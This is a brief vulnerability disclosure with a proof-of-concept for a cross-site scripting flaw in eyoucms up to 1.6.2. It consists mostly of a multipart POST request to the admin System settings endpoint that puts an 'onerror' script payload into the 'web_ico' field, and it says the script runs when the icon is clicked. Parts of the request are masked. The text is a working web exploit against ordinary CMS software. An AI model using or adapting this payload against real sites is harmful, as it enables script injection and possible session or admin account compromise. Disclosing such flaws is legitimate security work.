eyoucms up to 1.6.2 'web_ico' reflected xss vulnerability POC:
POST /eyoucms/login.php?m=admin&c=System&a=web&lang=cn HTTP/1.1
*****************************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy
********************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy
Content-Disposition: form-data; name="web_ico"
<img src=1 onerror=alert(8)>
------WebKitFormBoundaryq3khRwDr0dBifJAy
**********************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy--
Then when click the icon again, a XSS will be triggered

